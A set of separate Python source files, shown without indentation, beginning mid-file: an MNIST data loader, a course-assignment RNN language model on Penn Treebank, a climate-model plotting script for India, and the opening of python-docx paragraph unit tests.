rows = _read32(bytestream)
cols = _read32(bytestream)
buf = bytestream.read(rows * cols * num_images)
data = numpy.frombuffer(buf, dtype=numpy.uint8)
data = data.reshape(num_images, rows, cols, 1)
return data
def dense_to_one_hot(labels_dense, num_classes):
"""Convert class labels from scalars to one-hot vectors."""
num_labels = labels_dense.shape[0]
index_offset = numpy.arange(num_labels) * num_classes
labels_one_hot = numpy.zeros((num_labels, num_classes))
labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1
return labels_one_hot
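# --- Illustrative note (editor's addition) --- dense_to_one_hot fills the
# one-hot matrix through flat indexing: for labels [0, 2, 1] and num_classes=3,
# index_offset is [0, 3, 6], so flat positions [0, 5, 7] of the 3x3 zero matrix
# are set to 1, producing the rows [1, 0, 0], [0, 0, 1] and [0, 1, 0].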
def extract_labels(filename, one_hot=False, num_classes=10):
"""Extract the labels into a 1D uint8 numpy array [index]."""
print('Extracting', filename)
with gfile.Open(filename, 'rb') as f, gzip.GzipFile(fileobj=f) as bytestream:
magic = _read32(bytestream)
if magic != 2049:
raise ValueError(
'Invalid magic number %d in MNIST label file: %s' %
(magic, filename))
num_items = _read32(bytestream)
buf = bytestream.read(num_items)
labels = numpy.frombuffer(buf, dtype=numpy.uint8)
if one_hot:
return dense_to_one_hot(labels, num_classes)
return labels
class DataSet(object):
def __init__(self, images, labels, fake_data=False, one_hot=False,
dtype=dtypes.float32):
"""Construct a DataSet.
one_hot arg is used only if fake_data is true. `dtype` can be either
`uint8` to leave the input as `[0, 255]`, or `float32` to rescale into
`[0, 1]`.
"""
dtype = dtypes.as_dtype(dtype).base_dtype
if dtype not in (dtypes.uint8, dtypes.float32):
raise TypeError('Invalid image dtype %r, expected uint8 or float32' %
dtype)
if fake_data:
self._num_examples = 10000
self.one_hot = one_hot
else:
assert images.shape[0] == labels.shape[0], (
'images.shape: %s labels.shape: %s' % (images.shape,
labels.shape))
self._num_examples = images.shape[0]
# Convert shape from [num examples, rows, columns, depth]
# to [num examples, rows*columns] (assuming depth == 1)
assert images.shape[3] == 1
images = images.reshape(images.shape[0],
images.shape[1] * images.shape[2])
if dtype == dtypes.float32:
# Convert from [0, 255] -> [0.0, 1.0].
images = images.astype(numpy.float32)
images = numpy.multiply(images, 1.0 / 255.0)
self._images = images
self._labels = labels
self._epochs_completed = 0
self._index_in_epoch = 0
@property
def images(self):
return self._images
@property
def labels(self):
return self._labels
@property
def num_examples(self):
return self._num_examples
@property
def epochs_completed(self):
return self._epochs_completed
def next_batch(self, batch_size, fake_data=False):
"""Return the next `batch_size` examples from this data set."""
if fake_data:
fake_image = [1] * 784
if self.one_hot:
fake_label = [1] + [0] * 9
else:
fake_label = 0
return [fake_image for _ in xrange(batch_size)], [
fake_label for _ in xrange(batch_size)]
start = self._index_in_epoch
self._index_in_epoch += batch_size
if self._index_in_epoch > self._num_examples:
# Finished epoch
self._epochs_completed += 1
# Shuffle the data
perm = numpy.arange(self._num_examples)
numpy.random.shuffle(perm)
self._images = self._images[perm]
self._labels = self._labels[perm]
# Start next epoch
start = 0
self._index_in_epoch = batch_size
assert batch_size <= self._num_examples
end = self._index_in_epoch
return self._images[start:end], self._labels[start:end]
def read_data_sets(train_dir, fake_data=False, one_hot=False, dtype=dtypes.float32):
if fake_data:
def fake():
return DataSet([], [], fake_data=True, one_hot=one_hot, dtype=dtype)
train = fake()
validation = fake()
test = fake()
return base.Datasets(train=train, validation=validation, test=test)
TRAIN_IMAGES = 'train-images-idx3-ubyte.gz'
TRAIN_LABELS = 'train-labels-idx1-ubyte.gz'
TEST_IMAGES = 't10k-images-idx3-ubyte.gz'
TEST_LABELS = 't10k-labels-idx1-ubyte.gz'
VALIDATION_SIZE = 5000
local_file = base.maybe_download(TRAIN_IMAGES, train_dir, SOURCE_URL + TRAIN_IMAGES)
train_images = extract_images(local_file)
local_file = base.maybe_download(TRAIN_LABELS, train_dir, SOURCE_URL + TRAIN_LABELS)
train_labels = extract_labels(local_file, one_hot=one_hot)
local_file = base.maybe_download(TEST_IMAGES, train_dir, SOURCE_URL + TEST_IMAGES)
test_images = extract_images(local_file)
local_file = base.maybe_download(TEST_LABELS, train_dir, SOURCE_URL + TEST_LABELS)
test_labels = extract_labels(local_file, one_hot=one_hot)
validation_images = train_images[:VALIDATION_SIZE]
validation_labels = train_labels[:VALIDATION_SIZE]
train_images = train_images[VALIDATION_SIZE:]
train_labels = train_labels[VALIDATION_SIZE:]
train = DataSet(train_images, train_labels, dtype=dtype)
validation = DataSet(validation_images, validation_labels,
dtype=dtype)
test = DataSet(test_images, test_labels, dtype=dtype)
return base.Datasets(train=train, validation=validation, test=test)
def load_mnist():
return read_data_sets("MNIST_data")
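if __name__ == '__main__':
    # Illustrative usage sketch (editor's addition, not part of the original
    # module): download MNIST into ./MNIST_data and draw one mini-batch; the
    # directory name and batch size are arbitrary.
    datasets = read_data_sets('MNIST_data', one_hot=True)
    images, labels = datasets.train.next_batch(100)
    print('batch shapes:', images.shape, labels.shape)  # (100, 784) (100, 10)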
|
|
import getpass
import sys
import time
import numpy as np
from copy import deepcopy
from utils import calculate_perplexity, get_ptb_dataset, Vocab
from utils import ptb_iterator, sample
import tensorflow as tf
from tensorflow.python.ops.seq2seq import sequence_loss
from model import LanguageModel
# Let's set the parameters of our model
# http://arxiv.org/pdf/1409.2329v4.pdf shows parameters that would achieve near
# SotA numbers
class Config(object):
"""Holds model hyperparams and data information.
The Config class stores the model hyperparameters and dataset
information. Model objects are passed a Config() object at
instantiation.
"""
batch_size = 64
embed_size = 50
hidden_size = 100
num_steps = 10
max_epochs = 16
early_stopping = 2
dropout = 0.9
lr = 0.001
class RNNLM_Model(LanguageModel):
def load_data(self, debug=False):
"""Loads starter word-vectors and train/dev/test data."""
self.vocab = Vocab()
self.vocab.construct(get_ptb_dataset('train'))
self.encoded_train = np.array(
[self.vocab.encode(word) for word in get_ptb_dataset('train')],
dtype=np.int32)
self.encoded_valid = np.array(
[self.vocab.encode(word) for word in get_ptb_dataset('valid')],
dtype=np.int32)
self.encoded_test = np.array(
[self.vocab.encode(word) for word in get_ptb_dataset('test')],
dtype=np.int32)
if debug:
num_debug = 1024
self.encoded_train = self.encoded_train[:num_debug]
self.encoded_valid = self.encoded_valid[:num_debug]
self.encoded_test = self.encoded_test[:num_debug]
def add_placeholders(self):
"""Generate placeholder variables to represent the input tensors
These placeholders are used as inputs by the rest of the model building
code and will be fed data during training. Note that when "None" appears
in a placeholder's shape, that dimension is flexible.
Adds the following nodes to the computational graph:
input_placeholder: Input placeholder tensor of shape
(None, num_steps), type tf.int32
labels_placeholder: Labels placeholder tensor of shape
(None, num_steps), type tf.int32
dropout_placeholder: Dropout value placeholder (scalar),
type tf.float32
Add these placeholders to self as the instance variables
self.input_placeholder
self.labels_placeholder
self.dropout_placeholder
(Don't change the variable names)
"""
### YOUR CODE HERE
self.input_placeholder = tf.placeholder(
tf.int32, shape=[None, self.config.num_steps], name='Input')
self.labels_placeholder = tf.placeholder(
tf.int32, shape=[None, self.config.num_steps], name='Target')
self.dropout_placeholder = tf.placeholder(tf.float32, name='Dropout')
### END YOUR CODE
def add_embedding(self):
"""Add embedding layer.
Hint: This layer should use the input_placeholder to index into the
embedding.
Hint: You might find tf.nn.embedding_lookup useful.
Hint: You might find tf.split, tf.squeeze useful in constructing tensor inputs
Hint: Check the last slide from the TensorFlow lecture.
Hint: Here are the dimensions of the variables you will need to create:
L: (len(self.vocab), embed_size)
Returns:
inputs: List of length num_steps, each of whose elements should be
a tensor of shape (batch_size, embed_size).
"""
# The embedding lookup is currently only implemented for the CPU
with tf.device('/cpu:0'):
### YOUR CODE HERE
embedding = tf.get_variable(
'Embedding',
[len(self.vocab), self.config.embed_size], trainable=True)
inputs = tf.nn.embedding_lookup(embedding, self.input_placeholder)
inputs = [
tf.squeeze(x, [1]) for x in tf.split(1, self.config.num_steps, inputs)]
### END YOUR CODE
return inputs
def add_projection(self, rnn_outputs):
"""Adds a projection layer.
The projection layer transforms the hidden representation to a distribution
over the vocabulary.
Hint: Here are the dimensions of the variables you will need to
create
U: (hidden_size, len(vocab))
b_2: (len(vocab),)
Args:
rnn_outputs: List of length num_steps, each of whose elements should be
a tensor of shape (batch_size, hidden_size).
Returns:
outputs: List of length num_steps, each a tensor of shape
(batch_size, len(vocab)).
"""
### YOUR CODE HERE
with tf.variable_scope('Projection'):
U = tf.get_variable(
'Matrix', [self.config.hidden_size, len(self.vocab)])
proj_b = tf.get_variable('Bias', [len(self.vocab)])
outputs = [tf.matmul(o, U) + proj_b for o in rnn_outputs]
### END YOUR CODE
return outputs
def add_loss_op(self, output):
"""Adds loss ops to the computational graph.
Hint: Use tensorflow.python.ops.seq2seq.sequence_loss to implement sequence loss.
Args:
output: A tensor of shape (None, self.vocab)
Returns:
loss: A 0-d tensor (scalar)
"""
### YOUR CODE HERE
all_ones = [tf.ones([self.config.batch_size * self.config.num_steps])]
cross_entropy = sequence_loss(
[output], [tf.reshape(self.labels_placeholder, [-1])], all_ones, len(self.vocab))
tf.add_to_collection('total_loss', cross_entropy)
loss = tf.add_n(tf.get_collection('total_loss'))
### END YOUR CODE
return loss
def add_training_op(self, loss):
"""Sets up the training Ops.
Creates an optimizer and applies the gradients to all trainable variables.
The Op returned by this function is what must be passed to the
`sess.run()` call to cause the model to train. See
https://www.tensorflow.org/versions/r0.7/api_docs/python/train.html#Optimizer
for more information.
Hint: Use tf.train.AdamOptimizer for this model.
Calling optimizer.minimize() will return a train_op object.
Args:
loss: Loss tensor, from cross_entropy_loss.
Returns:
train_op: The Op for training.
"""
### YOUR CODE HERE
optimizer = tf.train.AdamOptimizer(self.config.lr)
train_op = optimizer.minimize(loss)
### END YOUR CODE
return train_op
def __init__(self, config):
self.config = config
self.load_data(debug=False)
self.add_placeholders()
self.inputs = self.add_embedding()
self.rnn_outputs = self.add_model(self.inputs)
self.outputs = self.add_projection(self.rnn_outputs)
# We want to check how well we correctly predict the next word
# We cast o to float64 as there are numerical issues at hand
# (i.e. sum(output of softmax) = 1.00000298179 and not 1)
self.predictions = [tf.nn.softmax(tf.cast(o, 'float64')) for o in self.outputs]
# Reshape the output into len(vocab) sized chunks - the -1 says as many as
# needed to evenly divide
output = tf.reshape(tf.concat(1, self.outputs), [-1, len(self.vocab)])
self.calculate_loss = self.add_loss_op(output)
self.train_step = self.add_training_op(self.calculate_loss)
def add_model(self, inputs):
"""Creates the RNN LM model.
In the space provided below, you need to implement the equations for the
RNN LM model. Note that you may NOT use built in rnn_cell functions from
tensorflow.
Hint: Use a zeros tensor of shape (batch_size, hidden_size) as
initial state for the RNN. Add this to self as instance variable
self.initial_state
(Don't change variable name)
Hint: Add the last RNN output to self as instance variable
self.final_state
(Don't change variable name)
Hint: Make sure to apply dropout to the inputs and the outputs.
Hint: Use a variable scope (e.g. "RNN") to define RNN variables.
Hint: Perform an explicit for-loop over inputs. You can use
scope.reuse_variables() to ensure that the weights used at each
iteration (each time-step) are the same. (Make sure you don't call
this for iteration 0 though or nothing will be initialized!)
Hint: Here are the dimensions of the various variables you will need to
create:
H: (hidden_size, hidden_size)
I: (embed_size, hidden_size)
b_1: (hidden_size,)
Args:
inputs: List of length num_steps, each of whose elements should be
a tensor of shape (batch_size, embed_size).
Returns:
outputs: List of length num_steps, each of whose elements should be
a tensor of shape (batch_size, hidden_size)
"""
### YOUR CODE HERE
with tf.variable_scope('InputDropout'):
inputs = [tf.nn.dropout(x, self.dropout_placeholder) for x in inputs]
with tf.variable_scope('RNN') as scope:
self.initial_state = tf.zeros(
[self.config.batch_size, self.config.hidden_size])
state = self.initial_state
rnn_outputs = []
for tstep, current_input in enumerate(inputs):
if tstep > 0:
scope.reuse_variables()
RNN_H = tf.get_variable(
'HMatrix', [self.config.hidden_size, self.config.hidden_size])
RNN_I = tf.get_variable(
'IMatrix', [self.config.embed_size, self.config.hidden_size])
RNN_b = tf.get_variable(
'B', [self.config.hidden_size])
state = tf.nn.sigmoid(
tf.matmul(state, RNN_H) + tf.matmul(current_input, RNN_I) + RNN_b)
rnn_outputs.append(state)
self.final_state = rnn_outputs[-1]
with tf.variable_scope('RNNDropout'):
rnn_outputs = [tf.nn.dropout(x, self.dropout_placeholder) for x in rnn_outputs]
### END YOUR CODE
return rnn_outputs
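# --- Illustrative note (editor's addition, not part of the original model) ---
# The recurrence implemented above, written out for a single time-step:
#
#     h_t = sigmoid(h_prev.dot(H) + x_t.dot(I) + b_1)
#
# where h_prev is (batch_size, hidden_size), x_t is (batch_size, embed_size),
# H is (hidden_size, hidden_size), I is (embed_size, hidden_size) and b_1 is
# (hidden_size,), so h_t is again (batch_size, hidden_size).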
def run_epoch(self, session, data, train_op=None, verbose=10):
config = self.config
dp = config.dropout
if not train_op:
train_op = tf.no_op()
dp = 1
total_steps = sum(1 for x in ptb_iterator(data, config.batch_size, config.num_steps))
total_loss = []
state = self.initial_state.eval()
for step, (x, y) in enumerate(
ptb_iterator(data, config.batch_size, config.num_steps)):
# We need to pass in the initial state and retrieve the final state to give
# the RNN proper history
feed = {self.input_placeholder: x,
self.labels_placeholder: y,
self.initial_state: state,
self.dropout_placeholder: dp}
loss, state, _ = session.run(
[self.calculate_loss, self.final_state, train_op], feed_dict=feed)
total_loss.append(loss)
if verbose and step % verbose == 0:
sys.stdout.write('\r{} / {} : pp = {}'.format(
step, total_steps, np.exp(np.mean(total_loss))))
sys.stdout.flush()
if verbose:
sys.stdout.write('\r')
return np.exp(np.mean(total_loss))
def generate_text(session, model, config, starting_text='<eos>',
stop_length=100, stop_tokens=None, temp=1.0):
"""Generate text from the model.
Hint: Create a feed-dictionary and use sess.run() to execute the model. Note
that you will need to use model.initial_state as a key to feed_dict
Hint: Fetch model.final_state and model.predictions[-1]. (You set
model.final_state in add_model() and model.predictions is set in
__init__)
Hint: Store the outputs of running the model in local variables state and
y_pred (used in the pre-implemented parts of this function.)
Args:
session: tf.Session() object
model: Object of type RNNLM_Model
config: A Config() object
starting_text: Initial text passed to model.
Returns:
output: List of word idxs
"""
state = model.initial_state.eval()
# Imagine tokens as a batch size of one, length of len(tokens[0])
tokens = [model.vocab.encode(word) for word in starting_text.split()]
for i in xrange(stop_length):
### YOUR CODE HERE
feed = {model.input_placeholder: [tokens[-1:]],
model.initial_state: state,
model.dropout_placeholder: 1}
state, y_pred = session.run(
[model.final_state, model.predictions[-1]], feed_dict=feed)
### END YOUR CODE
next_word_idx = sample(y_pred[0], temperature=temp)
tokens.append(next_word_idx)
if stop_tokens and model.vocab.decode(tokens[-1]) in stop_tokens:
break
output = [model.vocab.decode(word_idx) for word_idx in tokens]
return output
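# --- Illustrative sketch (editor's addition) --- `sample` above comes from the
# course's utils module; a hypothetical temperature-scaled sampler with the same
# intent could look like this (it reuses the module-level numpy import `np`):
def _sample_with_temperature(probs, temperature=1.0):
    """Draw an index from a probability vector after temperature scaling."""
    logits = np.log(np.asarray(probs, dtype=np.float64) + 1e-12) / temperature
    scaled = np.exp(logits - np.max(logits))
    scaled /= scaled.sum()
    return int(np.random.choice(len(scaled), p=scaled))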
def generate_sentence(session, model, config, *args, **kwargs):
"""Convenice to generate a sentence from the model."""
return generate_text(session, model, config, *args, stop_tokens=['<eos>'], **kwargs)
def test_RNNLM():
config = Config()
gen_config = deepcopy(config)
gen_config.batch_size = gen_config.num_steps = 1
# We create the training model and generative model
with tf.variable_scope('RNNLM') as scope:
model = RNNLM_Model(config)
# This instructs gen_model to reuse the same variables as the model above
scope.reuse_variables()
gen_model = RNNLM_Model(gen_config)
init = tf.initialize_all_variables()
saver = tf.train.Saver()
with tf.Session() as session:
best_val_pp = float('inf')
best_val_epoch = 0
session.run(init)
for epoch in xrange(config.max_epochs):
print 'Epoch {}'.format(epoch)
start = time.time()
###
train_pp = model.run_epoch(
session, model.encoded_train,
train_op=model.train_step)
valid_pp = model.run_epoch(session, model.encoded_valid)
print 'Training perplexity: {}'.format(train_pp)
print 'Validation perplexity: {}'.format(valid_pp)
if valid_pp < best_val_pp:
best_val_pp = valid_pp
best_val_epoch = epoch
saver.save(session, './ptb_rnnlm.weights')
if epoch - best_val_epoch > config.early_stopping:
break
print 'Total time: {}'.format(time.time() - start)
saver.restore(session, 'ptb_rnnlm.weights')
test_pp = model.run_epoch(session, model.encoded_test)
print '=-=' * 5
print 'Test perplexity: {}'.format(test_pp)
print '=-=' * 5
starting_text = 'in palo alto'
while starting_text:
print ' '.join(generate_sentence(
session, gen_model, gen_config, starting_text=starting_text, temp=1.0))
starting_text = raw_input('> ')
if __name__ == "__main__":
test_RNNLM()
|
|
"""
Load pp, plot and save
8km difference
"""
import os, sys
#%matplotlib inline
#%pylab inline
import matplotlib
matplotlib.use('Agg')
# Must be before importing matplotlib.pyplot or pylab!
from matplotlib import rc
from matplotlib.font_manager import FontProperties
from matplotlib import rcParams
from mpl_toolkits.basemap import Basemap
rc('font', family = 'serif', serif = 'cmr10')
rc('text', usetex=True)
rcParams['text.usetex']=True
rcParams['text.latex.unicode']=True
rcParams['font.family']='serif'
rcParams['font.serif']='cmr10'
import matplotlib.pyplot as plt
#from matplotlib import figure
import matplotlib as mpl
import matplotlib.cm as mpl_cm
import numpy as np
import iris
import iris.coords as coords
import iris.quickplot as qplt
import iris.plot as iplt
import iris.coord_categorisation
import iris.unit as unit
import cartopy.crs as ccrs
import cartopy.io.img_tiles as cimgt
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import datetime
from mpl_toolkits.basemap import cm
import imp
from textwrap import wrap
import re
import iris.analysis.cartography
import math
from dateutil import tz
#import multiprocessing as mp
import gc
import types
import pdb
save_path='/nfs/a90/eepdw/Figures/EMBRACE/'
model_name_convert_title = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_title.py')
unrotate = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/unrotate_pole.py')
pp_file_contourf = 'tcwv_mean_by_date_range'
pp_file_contour ='408'
#plot_diags=['sp_hum']
plot_levels = [925]
#experiment_ids = ['dkmbq', 'dklyu']
experiment_ids = ['dklyu', 'dkmbq', 'djzny', 'djznw', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
cb_label='mm'
min_contour=40.
max_contour=70.
tick_interval=5.
clevs = np.linspace(min_contour, max_contour,16)
cmap=plt.cm.jet
ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
pp_file_path = '/nfs/a90/eepdw/Data/EMBRACE/'
degs_crop_top = 1.7
degs_crop_bottom = 2.5
from iris.coord_categorisation import add_categorised_coord
# def add_hour_of_day(cube, coord, name='hour'):
# add_categorised_coord(cube, name, coord,
# lambda coord, x: coord.units.num2date(x).hour)
figprops = dict(figsize=(8,8), dpi=100)
#cmap=cm.s3pcpn_l
u = unit.Unit('hours since 1970-01-01 00:00:00',calendar='gregorian')
dx, dy = 10, 10
divisor=10 # for lat/lon rounding
lon_high = 101.866
lon_low = 64.115
lat_high = 33.
lat_low =-6.79
lon_low_tick=lon_low -(lon_low%divisor)
lon_high_tick=math.ceil(lon_high/divisor)*divisor
lat_low_tick=lat_low - (lat_low%divisor)
lat_high_tick=math.ceil(lat_high/divisor)*divisor
def main():
#clevs_col = np.arange(clev_min, clev_max)
for p_level in plot_levels:
# Set pressure height contour min/max
if p_level == 925:
clev_min = 680.
clev_max = 810.
elif p_level == 850:
clev_min = 1435.
clev_max = 1530.
elif p_level == 700:
clev_min = 3090.
clev_max = 3155.
elif p_level == 500:
clev_min = 5800.
clev_max = 5890.
else:
print 'Contour min/max not set for this pressure level'
# Set potential temperature min/max
if p_level == 925:
clevpt_min = 298.
clevpt_max = 310.
elif p_level == 850:
clevpt_min = 302.
clevpt_max = 312.
elif p_level == 700:
clevpt_min = 312.
clevpt_max = 320.
elif p_level == 500:
clevpt_min = 325.
clevpt_max = 332.
else:
print 'Potential temperature min/max not set for this pressure level'
# Set specific humidity min/max
if p_level == 925:
clevsh_min = 0.012
clevsh_max = 0.020
elif p_level == 850:
clevsh_min = 0.007
clevsh_max = 0.017
elif p_level == 700:
clevsh_min = 0.002
clevsh_max = 0.010
elif p_level == 500:
clevsh_min = 0.001
clevsh_max = 0.005
else:
print 'Specific humidity min/max not set for this pressure level'
clevs_lin = np.arange(clev_min, clev_max, 5)
p_level_constraint = iris.Constraint(pressure=p_level)
#for plot_diag in plot_diags:
for experiment_id in experiment_ids:
expmin1 = experiment_id[:-1]
pfile = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_%s.pp' % (expmin1, experiment_id, experiment_id, pp_file_contourf)
#pc = iris(pfile)
pcube_contourf = iris.load_cube(pfile)
pcube_contourf=iris.analysis.maths.multiply(pcube_contourf,-1000)
#pdb.set_trace()
height_pp_file = '%s_%s_on_p_levs_mean_by_date_range.pp' % (experiment_id, pp_file_contour)
height_pfile = '%s%s/%s/%s' % (pp_file_path, expmin1, experiment_id, height_pp_file)
pcube_contour = iris.load_cube(height_pfile, p_level_constraint)
time_coords = pcube_contourf.coord('time')
iris.coord_categorisation.add_day_of_year(pcube_contourf, time_coords, name='day_of_year')
time_coords = pcube_contour.coord('time')
iris.coord_categorisation.add_day_of_year(pcube_contour, time_coords, name='day_of_year')
for t, time_cube in enumerate(pcube_contourf.slices(['grid_latitude', 'grid_longitude'])):
#height_cube_slice = pcube_contour.extract(iris.Constraint(day_of_year=time_cube.coord('day_of_year').points))
height_cube_slice = pcube_contour[t]
#pdb.set_trace()
# Get time of averages for plot title
h = u.num2date(np.array(time_cube.coord('time').points, dtype=float)[0]).strftime('%d%b')
#Convert to India time
from_zone = tz.gettz('UTC')
to_zone = tz.gettz('Asia/Kolkata')
h_utc = u.num2date(np.array(time_cube.coord('day_of_year').points, dtype=float)[0]).replace(tzinfo=from_zone)
h_local = h_utc.astimezone(to_zone).strftime('%H%M')
fig = plt.figure(**figprops)
#cmap=plt.cm.RdBu_r
ax = plt.axes(projection=ccrs.PlateCarree(), extent=(lon_low,lon_high,lat_low+degs_crop_bottom,lat_high-degs_crop_top))
m =\
Basemap(llcrnrlon=lon_low,llcrnrlat=lat_low,urcrnrlon=lon_high,urcrnrlat=lat_high, rsphere = 6371229)
# lat = pcube_contourf.coord('grid_latitude').points
# lon = pcube_contourf.coord('grid_longitude').points
# cs = cube.coord_system('CoordSystem')
# lons, lats = np.meshgrid(lon, lat)
# lons, lats = iris.analysis.cartography.unrotate_pole\
# (lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
# x,y = m(lons,lats)
# if plot_diag=='temp':
# min_contour = clevpt_min
# max_contour = clevpt_max
# cb_label='K'
# main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), potential temperature (colours),\
# and wind (vectors) %s UTC %s IST' % (h, h_local)
# tick_interval=2
# clev_number=max_contour-min_contour+1
# elif plot_diag=='sp_hum':
# min_contour = clevsh_min
# max_contour = clevsh_max
# cb_label='kg/kg'
# main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), specific humidity (colours),\
# and wind (vectors) %s UTC %s IST' % (h, h_local)
# tick_interval=0.002
# clev_number=max_contour-min_contour+0.001
# clevs = np.linspace(min_contour, max_contour, clev_number)
# #clevs = np.linspace(-3, 3, 32)
# cont = plt.contourf(x,y,time_cube.data, clevs, cmap=cmap, extend='both')
cont = iplt.contourf(time_cube, clevs, cmap=cmap, extend='both')
#pdb.set_trace()
cs_lin = iplt.contour(height_cube_slice, clevs_lin,colors='#262626',linewidths=1.)
plt.clabel(cs_lin, fontsize=14, fmt='%d', color='black')
#del time_cube
#plt.clabel(cont, fmt='%d')
#ax.stock_img()
ax.coastlines(resolution='110m', color='#262626')
gl = ax.gridlines(draw_labels=True,linewidth=0.5, color='#262626', alpha=0.5, linestyle='--')
gl.xlabels_top = False
gl.ylabels_right = False
#gl.xlines = False
dx, dy = 10, 10
gl.xlocator = mticker.FixedLocator(range(int(lon_low_tick),int(lon_high_tick)+dx,dx))
gl.ylocator = mticker.FixedLocator(range(int(lat_low_tick),int(lat_high_tick)+dy,dy))
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
gl.xlabel_style = {'size': 12, 'color':'#262626'}
#gl.xlabel_style = {'color': '#262626', 'weight': 'bold'}
gl.ylabel_style = {'size': 12, 'color':'#262626'}
# cbar = fig.colorbar(cont, orientation='horizontal', pad=0.05, extend='both')
# cbar.set_label('%s' % cb_label, fontsize=10, color='#262626')
# #cbar.set_label(time_cube.units, fontsize=10, color='#262626')
# cbar.set_ticks(np.arange(min_contour, max_contour+tick_interval,tick_interval))
# ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
# cbar.set_ticklabels(['${%.1f}$' % i for i in ticks])
# cbar.ax.tick_params(labelsize=10, color='#262626')
#main_title='Mean Rainfall for EMBRACE Period -%s UTC (%s IST)' % (h, h_local)
#main_title=time_cube.standard_name.title().replace('_',' ')
#model_info = re.sub(r'[(\']', ' ', model_info)
#model_info = re.sub(r'[\',)]', ' ', model_info)
#print model_info
file_save_name = '%s_%s_and_%s_%s_hPa_and_geop_height_%s' % (experiment_id, pp_file_contour, pp_file_contourf, p_level, h)
save_dir = '%s%s/%s_and_%s' % (save_path, experiment_id, pp_file_contour, pp_file_contourf)
if not os.path.exists('%s' % save_dir): os.makedirs('%s' % (save_dir))
#plt.show()
#fig.savefig('%s/%s_notitle.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
plt.title('%s UTC' % (h))
fig.savefig('%s/%s_short_title.png' % (save_dir, file_save_name) , format='png', bbox_inches='tight')
#model_info=re.sub('(.{68} )', '\\1\n', str(model_name_convert_title.main(experiment_id)), 0, re.DOTALL)
#plt.title('\n'.join(wrap('%s\n%s' % (main_title, model_info), 1000,replace_whitespace=False)), fontsize=16)
#fig.savefig('%s/%s.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
fig.clf()
plt.close()
#del time_cube
gc.collect()
if __name__ == '__main__':
main()
#proc=mp.Process(target=worker)
#proc.daemon=True
#proc.start()
#proc.join()
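# --- Illustrative note (editor's addition, not part of the original script) ---
# The gridline labelling inside main() reduces to this cartopy recipe (tick
# values here are arbitrary):
#
#     ax = plt.axes(projection=ccrs.PlateCarree())
#     gl = ax.gridlines(draw_labels=True, linewidth=0.5, linestyle='--')
#     gl.xlabels_top = False
#     gl.ylabels_right = False
#     gl.xlocator = mticker.FixedLocator(range(60, 110, 10))
#     gl.ylocator = mticker.FixedLocator(range(-10, 40, 10))
#     gl.xformatter = LONGITUDE_FORMATTER
#     gl.yformatter = LATITUDE_FORMATTER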
|
|
# encoding: utf-8
"""Unit test suite for the docx.text.paragraph module"""
from __future__ import absolute_import, division, print_function, unicode_literals
from docx.enum.style import WD_STYLE_TYPE
from docx.enum.text import WD_ALIGN_PARAGRAPH
from docx.oxml.text.paragraph import CT_P
from docx.oxml.text.run import CT_R
from docx.parts.document import DocumentPart
from docx.text.paragraph import Paragraph
from docx.text.parfmt import ParagraphFormat
from docx.text.run import Run
import pytest
from ..unitutil.cxml import element, xml
from ..unitutil.mock import (
call, class_mock, instance_mock, method_mock, property_mock
)
class DescribeParagraph(object):
def it_knows_its_paragraph_style(self, style_get_fixture):
paragraph, style_id_, style_ = style_get_fixture
style = paragraph.style
paragraph.part.get_style.assert_called_once_with(
style_id_, WD_STYLE_TYPE.PARAGRAPH
)
assert style is style_
def it_can_change_its_paragraph_style(self, style_set_fixture):
paragraph, value, expected_xml = style_set_fixture
paragraph.style = value
paragraph.part.get_style_id.assert_called_once_with(
value, WD_STYLE_TYPE.PARAGRAPH
)
assert paragraph._p.xml == expected_xml
def it_knows_the_text_it_contains(self, text_get_fixture):
paragraph, expected_text = text_get_fixture
assert paragraph.text == expected_text
def it_can_replace_the_text_it_contains(self, text_set_fixture):
paragraph, text, expected_text = text_set_fixture
paragraph.text = text
assert paragraph.text == expected_text
def it_knows_its_alignment_value(self, alignment_get_fixture):
paragraph, expected_value = alignment_get_fixture
assert paragraph.alignment == expected_value
def it_can_change_its_alignment_value(self, alignment_set_fixture):
paragraph, value, expected_xml = alignment_set_fixture
paragraph.alignment = value
assert paragraph._p.xml == expected_xml
def it_provides_access_to_its_paragraph_format(self, parfmt_fixture):
paragraph, ParagraphFormat_, paragraph_format_ = parfmt_fixture
paragraph_format = paragraph.paragraph_format
ParagraphFormat_.assert_called_once_with(paragraph._element)
assert paragraph_format is paragraph_format_
def it_provides_access_to_the_runs_it_contains(self, runs_fixture):
paragraph, Run_, r_, r_2_, run_, run_2_ = runs_fixture
runs = paragraph.runs
assert Run_.mock_calls == [
call(r_, paragraph), call(r_2_, paragraph)
]
assert runs == [run_, run_2_]
def it_can_add_a_run_to_itself(self, add_run_fixture):
paragraph, text, style, style_prop_, expected_xml = add_run_fixture
run = paragraph.add_run(text, style)
assert paragraph._p.xml == expected_xml
assert isinstance(run, Run)
assert run._r is paragraph._p.r_lst[0]
if style:
style_prop_.assert_called_once_with(style)
def it_can_insert_a_paragraph_before_itself(self, insert_before_fixture):
text, style, paragraph_, add_run_calls = insert_before_fixture
paragraph = Paragraph(None, None)
new_paragraph = paragraph.insert_paragraph_before(text, style)
paragraph._insert_paragraph_before.assert_called_once_with(paragraph)
assert new_paragraph.add_run.call_args_list == add_run_calls
assert new_paragraph.style == style
assert new_paragraph is paragraph_
def it_can_remove_its_content_while_preserving_formatting(
self, clear_fixture):
paragraph, expected_xml = clear_fixture
_paragraph = paragraph.clear()
assert paragraph._p.xml == expected_xml
assert _paragraph is paragraph
def it_inserts_a_paragraph_before_to_help(self, _insert_before_fixture):
paragraph, body, expected_xml = _insert_before_fixture
new_paragraph = paragraph._insert_paragraph_before()
assert isinstance(new_paragraph, Paragraph)
